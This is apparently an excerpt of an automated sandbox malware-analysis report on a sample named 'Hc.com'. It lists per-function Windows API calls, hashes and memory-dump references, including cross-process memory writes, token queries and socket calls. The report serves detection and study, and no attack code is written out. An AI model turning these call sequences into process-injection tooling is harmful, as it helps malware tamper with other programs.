                                                                                                                                                                        • Opcode ID: 8d8144ba4d190e411d3b27fe117192df162a78da517685c098fb7c2279a5117d
                                                                                                                                                                        • Instruction ID: a398f1965cd607575d1e305fa74ef54221a44e0a5bb517d847ac5102610b7632
                                                                                                                                                                        • Opcode Fuzzy Hash: 8d8144ba4d190e411d3b27fe117192df162a78da517685c098fb7c2279a5117d
                                                                                                                                                                        • Instruction Fuzzy Hash: 32016971C1165DEBDF00AFA4EE4DAEEBB7AFB08710F0005AAE901B2250DB309564C7A1
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002C1A60
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A6C
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A7B
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A82
                                                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002C1A99
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 842720411-0
                                                                                                                                                                        • Opcode ID: dfd716f3bd7cb4e74d77823968fa2f4dc1c8c47b0ff632804c812a335f1e2814
                                                                                                                                                                        • Instruction ID: 49630203fbf4700cc28319c0ac7ba1ff901e71036cf57fa94d9452b34db5a31c
                                                                                                                                                                        • Opcode Fuzzy Hash: dfd716f3bd7cb4e74d77823968fa2f4dc1c8c47b0ff632804c812a335f1e2814
                                                                                                                                                                        • Instruction Fuzzy Hash: 240181B5641206BFDB114F64EC4DE6B3B6EEF853B4B210468F945C3260DA31DC50DA60
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002C1916
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002C1922
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002C1931
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002C1938
                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002C194E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                                                        • Opcode ID: 6096dab16d913b15d37e78be88d6f66f07825b672174787cf66f733e5fda7fa6
                                                                                                                                                                        • Instruction ID: 04fbc1087a6484d38b34670c155623a32922750a4ee8ac798be1f791ca8a5a1c
                                                                                                                                                                        • Opcode Fuzzy Hash: 6096dab16d913b15d37e78be88d6f66f07825b672174787cf66f733e5fda7fa6
                                                                                                                                                                        • Instruction Fuzzy Hash: 12F06275100316ABDB210F65EC4EF673B6EEF897A0F100528FA45D7251CA70DC21CA60
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002C1976
                                                                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002C1982
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002C1991
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002C1998
                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002C19AE
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                                                        • Opcode ID: 8b25a5cc064c2bac8d2aaeab6cbe0105a6c41e05818f9ccb0acf1ea7f5353d47
                                                                                                                                                                        • Instruction ID: 58f5cb6f0078eec5301c0ee04e1373976ff85e4399f251eac054754be349c87d
                                                                                                                                                                        • Opcode Fuzzy Hash: 8b25a5cc064c2bac8d2aaeab6cbe0105a6c41e05818f9ccb0acf1ea7f5353d47
                                                                                                                                                                        • Instruction Fuzzy Hash: BBF06275100315ABD7214F64EC5DF673B6EEF897A0F100528FA45C7251CA70D821CA60
                                                                                                                                                                        APIs
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,002D0B24,?,002D3D41,?,00000001,002A3AF4,?), ref: 002D0CCB
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,002D0B24,?,002D3D41,?,00000001,002A3AF4,?), ref: 002D0CD8
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,002D0B24,?,002D3D41,?,00000001,002A3AF4,?), ref: 002D0CE5
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,002D0B24,?,002D3D41,?,00000001,002A3AF4,?), ref: 002D0CF2
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,002D0B24,?,002D3D41,?,00000001,002A3AF4,?), ref: 002D0CFF
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,002D0B24,?,002D3D41,?,00000001,002A3AF4,?), ref: 002D0D0C
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                        • Opcode ID: 8e3a06efcd7cd3846b0f860ba155283b12fb508cdb28644263892dce0b42472f
                                                                                                                                                                        • Instruction ID: e90340c4984c4b5d60f94c1c730ef72e56ad504322fb3ff88b33233ffab80b3e
                                                                                                                                                                        • Opcode Fuzzy Hash: 8e3a06efcd7cd3846b0f860ba155283b12fb508cdb28644263892dce0b42472f
                                                                                                                                                                        • Instruction Fuzzy Hash: A201DC71810B068FCB30AFA6D8C0916FAF9BF502157108A3FD19252A31C7B0A868DF80
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 002C65BF
                                                                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 002C65D6
                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 002C65EE
                                                                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 002C660A
                                                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 002C6624
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3741023627-0
                                                                                                                                                                        • Opcode ID: 4e996aab22e30d5d43dfd630d76c93bdebb4fb79b4c0bbab9cebadecfcacff95
                                                                                                                                                                        • Instruction ID: 8f70db47320b255e6dfb103703d832b9181b8e897cb83ee0a5ff552d9c5c1954
                                                                                                                                                                        • Opcode Fuzzy Hash: 4e996aab22e30d5d43dfd630d76c93bdebb4fb79b4c0bbab9cebadecfcacff95
                                                                                                                                                                        • Instruction Fuzzy Hash: 3B018630910304ABEB305F10ED4EFA67B7DFB00B55F00066DA187A10E1DBF4AA54CA51
                                                                                                                                                                        APIs
                                                                                                                                                                        • _free.LIBCMT ref: 0029DAD2
                                                                                                                                                                          • Part of subcall function 00292D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0029DB51,00331DC4,00000000,00331DC4,00000000,?,0029DB78,00331DC4,00000007,00331DC4,?,0029DF75,00331DC4), ref: 00292D4E
                                                                                                                                                                          • Part of subcall function 00292D38: GetLastError.KERNEL32(00331DC4,?,0029DB51,00331DC4,00000000,00331DC4,00000000,?,0029DB78,00331DC4,00000007,00331DC4,?,0029DF75,00331DC4,00331DC4), ref: 00292D60
                                                                                                                                                                        • _free.LIBCMT ref: 0029DAE4
                                                                                                                                                                        • _free.LIBCMT ref: 0029DAF6
                                                                                                                                                                        • _free.LIBCMT ref: 0029DB08
                                                                                                                                                                        • _free.LIBCMT ref: 0029DB1A
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                        • Opcode ID: 3f19f1e8205ed159eb7f218d5fc225fdbf190520d74c8053da280d4709eacd94
                                                                                                                                                                        • Instruction ID: 2683b98f971cfc9ae5c4e4eba5e4c3d41f9af1f3624acfcae10b26fb12bf1def
                                                                                                                                                                        • Opcode Fuzzy Hash: 3f19f1e8205ed159eb7f218d5fc225fdbf190520d74c8053da280d4709eacd94
                                                                                                                                                                        • Instruction Fuzzy Hash: 22F01D32564205BB8E65EF68EA86D1A77EDFE04714BA50C09F049D7501CB30FCA09AA4
                                                                                                                                                                        APIs
                                                                                                                                                                        • _free.LIBCMT ref: 0029262E
                                                                                                                                                                          • Part of subcall function 00292D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0029DB51,00331DC4,00000000,00331DC4,00000000,?,0029DB78,00331DC4,00000007,00331DC4,?,0029DF75,00331DC4), ref: 00292D4E
                                                                                                                                                                          • Part of subcall function 00292D38: GetLastError.KERNEL32(00331DC4,?,0029DB51,00331DC4,00000000,00331DC4,00000000,?,0029DB78,00331DC4,00000007,00331DC4,?,0029DF75,00331DC4,00331DC4), ref: 00292D60
                                                                                                                                                                        • _free.LIBCMT ref: 00292640
                                                                                                                                                                        • _free.LIBCMT ref: 00292653
                                                                                                                                                                        • _free.LIBCMT ref: 00292664
                                                                                                                                                                        • _free.LIBCMT ref: 00292675
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                        • Opcode ID: 3ab290b81eac0c01b9b1f8f67af71e6fec766dc5376ae0863e73c72a86977815
                                                                                                                                                                        • Instruction ID: 1d9976f3636621b8bf8b1df99d6f91efcf2a89bf3ddbd8b5a3ec7a4bf56f3d59
                                                                                                                                                                        • Opcode Fuzzy Hash: 3ab290b81eac0c01b9b1f8f67af71e6fec766dc5376ae0863e73c72a86977815
                                                                                                                                                                        • Instruction Fuzzy Hash: 1AF0FE70821521EB8F63AF54FD8184A3B6CFB28755F550A0AF414D6275C7310A26AFE5
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __freea$_free
                                                                                                                                                                        • String ID: a/p$am/pm
                                                                                                                                                                        • API String ID: 3432400110-3206640213
                                                                                                                                                                        • Opcode ID: 0cfba42ac509000922c6087f8d420d8429b64bffc768f8ae09a841a9dab54e32
                                                                                                                                                                        • Instruction ID: 4304552ba74555125fbb24c4246d3ccc68e52897f0061a37c376df924f17dcd3
                                                                                                                                                                        • Opcode Fuzzy Hash: 0cfba42ac509000922c6087f8d420d8429b64bffc768f8ae09a841a9dab54e32
                                                                                                                                                                        • Instruction Fuzzy Hash: CBD12375D302078ADF249FAAC8457FAB7B5FF05300F29415AE506AB290D3718DB0CBA0
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002D41FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,002E52EE,?,?,00000035,?), ref: 002D4229
                                                                                                                                                                          • Part of subcall function 002D41FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,002E52EE,?,?,00000035,?), ref: 002D4239
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 002E5419
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 002E550E
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 002E55CD
                                                                                                                                                                        Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                                                                                                                        • String ID: bn,
                                                                                                                                                                        • API String ID: 2854431205-2109009046
                                                                                                                                                                        • Opcode ID: 58b2959343999caf2c44881da0c505cf30e1344c2badc218e96db57d6e53e204
                                                                                                                                                                        • Instruction ID: 7a7c5b476fb4b203cd57546a1140c758c018d9041b24916b5c210b553f23e5ef
                                                                                                                                                                        • Opcode Fuzzy Hash: 58b2959343999caf2c44881da0c505cf30e1344c2badc218e96db57d6e53e204
                                                                                                                                                                        • Instruction Fuzzy Hash: 30D15C74920249DFCB04DF95C491EEDBBB8FF48308F54815DE416AB292DB31A996CF50
APIs
• __Init_thread_footer.LIBCMT ref: 0026D253
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: t53$t53$t53
• API String ID: 1385522511-176075375
• Opcode ID: eca08f64dc67496b0a5cb70def6867bc4bf0d3925c6e277bcfe6a6ce7f7e8334
• Instruction ID: 3baff84ee8173dfce6f308030455919704a58699bbb42069a94b22bfaf5e1ac6
• Opcode Fuzzy Hash: eca08f64dc67496b0a5cb70def6867bc4bf0d3925c6e277bcfe6a6ce7f7e8334
• Instruction Fuzzy Hash: 2E913AB5E2020ACFCB14CF59C4906A9B7F1FF59310F24815AE995AB341D771EAA2CF90
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: BuffCharUpper_wcslen
• String ID: CALLARGARRAY$bn,
• API String ID: 157775604-352716312
• Opcode ID: c0e7827e22b7dd95d0a334bd4148caa9225461f6b7b4763cc11fbd5a26cb6b00
• Instruction ID: c7c1b24ad0af30700d2c9e7d9e480b7d9b6bdc959799df880198fd99a4e29382
• Opcode Fuzzy Hash: c0e7827e22b7dd95d0a334bd4148caa9225461f6b7b4763cc11fbd5a26cb6b00
• Instruction Fuzzy Hash: 1641D471E20205DFCB00EFA5C8899BEBBB5FF693A0F50412AE906A7251D7719DA1CF50
APIs
  • Part of subcall function 002CBDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002C2B1D,?,?,00000034,00000800,?,00000034), ref: 002CBDF4
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002C30AD
  • Part of subcall function 002CBD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002C2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 002CBDBF
  • Part of subcall function 002CBCF1: GetWindowThreadProcessId.USER32(?,?), ref: 002CBD1C
  • Part of subcall function 002CBCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002C2AE1,00000034,?,?,00001004,00000000,00000000), ref: 002CBD2C
  • Part of subcall function 002CBCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002C2AE1,00000034,?,?,00001004,00000000,00000000), ref: 002CBD42
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002C311A
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002C3167
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
• Opcode ID: a465622d54087f01252ace799cbcfd2a7993917d2cc0689f42f742d25752d7b5
• Instruction ID: af14b9db9aa56c23fa886bc5e65782fb04e5cf157b5506c48272b1b422f26bb2
• Opcode Fuzzy Hash: a465622d54087f01252ace799cbcfd2a7993917d2cc0689f42f742d25752d7b5
• Instruction Fuzzy Hash: E0412B72910218AEDB11DFA4CD46FEEB7B8EF49300F008599EA45B7180DA716F95CF60
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\280366\Hc.com,00000104), ref: 00291AD9
• _free.LIBCMT ref: 00291BA4
• _free.LIBCMT ref: 00291BAE
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\AppData\Local\Temp\280366\Hc.com
• API String ID: 2506810119-1471809573
• Opcode ID: f8cc9f2691e4e5591ab3d43555e0fdfc11488b2fdb82f0dc47546dc7d9ffef51
• Instruction ID: 69fd8337405798218d32a3ff6154f5347c397ab4172e2f722d5362f0a349033a
• Opcode Fuzzy Hash: f8cc9f2691e4e5591ab3d43555e0fdfc11488b2fdb82f0dc47546dc7d9ffef51
• Instruction Fuzzy Hash: 8F317E71A1021AABDF21DF9ADC85D9FBBFDEB85714F1041A6E80497261E6B04E60CB90
APIs
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 002CCBB1
• DeleteMenu.USER32(?,00000007,00000000), ref: 002CCBF7
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003329C0,017160F8), ref: 002CCC40
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
• Opcode ID: 882df7f11441c66b6d8821fea511354d5fff295717918507777f18ca5db3977c
• Instruction ID: eb6fb45a3592c487a37a251bf8297038888bfcb132b5fe9a53c62008a478a002
• Opcode Fuzzy Hash: 882df7f11441c66b6d8821fea511354d5fff295717918507777f18ca5db3977c
• Instruction Fuzzy Hash: 4741A0716143029FD720DF24D885F6ABBE8EF85724F244A1EF4A997291D730AA24CB52
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,002FDCD0,00000000,?,?,?,?), ref: 002F4F48
• GetWindowLongW.USER32 ref: 002F4F65
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 002F4F75
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
                                                                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                                                                        • Opcode ID: 3f1b6c842375eed399b24ee08a38ab2c85bab7b5cf75287393e93251ac38c3ab
                                                                                                                                                                        • Instruction ID: b38970ea55b15002987f4e227b52373540c0cad114c001fdf6a7c413eb60c070
                                                                                                                                                                        • Opcode Fuzzy Hash: 3f1b6c842375eed399b24ee08a38ab2c85bab7b5cf75287393e93251ac38c3ab
                                                                                                                                                                        • Instruction Fuzzy Hash: E331B43112020AAFDB119F38DC45BEBB7A9EF04374F204725FA79921E0C7B0AC609B50
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002E3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,002E3AD4,?,?), ref: 002E3DD5
                                                                                                                                                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 002E3AD7
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002E3AF8
                                                                                                                                                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 002E3B63
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                        • String ID: 255.255.255.255
                                                                                                                                                                        • API String ID: 946324512-2422070025
                                                                                                                                                                        • Opcode ID: f2173c4f68a5619627c00b07061c297bce9ea17ae6c745978ce8978f8e6884c4
                                                                                                                                                                        • Instruction ID: 4542d227cc6b535a52a1a09a266ce0c2ef0d96a7324dcf4b6db0177c695172c8
                                                                                                                                                                        • Opcode Fuzzy Hash: f2173c4f68a5619627c00b07061c297bce9ea17ae6c745978ce8978f8e6884c4
                                                                                                                                                                        • Instruction Fuzzy Hash: F231D3392102829FCB10DF2AC589EA977E1EF14369FA4815DE8178B392D771EE51CB60
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002F49DC
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002F49F0
                                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 002F4A14
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Window
                                                                                                                                                                        • String ID: SysMonthCal32
                                                                                                                                                                        • API String ID: 2326795674-1439706946
                                                                                                                                                                        • Opcode ID: cb22a7ba8d32ea6adf5d579f39e388b998d33f05b07ed0c57d4e6b5bed1f10f3
                                                                                                                                                                        • Instruction ID: cdce55a49bdd48070f5044edcf2f12378909180c9d41e4958659e1b7c1decb4f
                                                                                                                                                                        • Opcode Fuzzy Hash: cb22a7ba8d32ea6adf5d579f39e388b998d33f05b07ed0c57d4e6b5bed1f10f3
                                                                                                                                                                        • Instruction Fuzzy Hash: 7A21BF32620219ABDF119F50DC46FEF7B69EF48768F110224FB15AB1D0D6B1AC61DB90
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002F51A3
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002F51B1
                                                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002F51B8
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
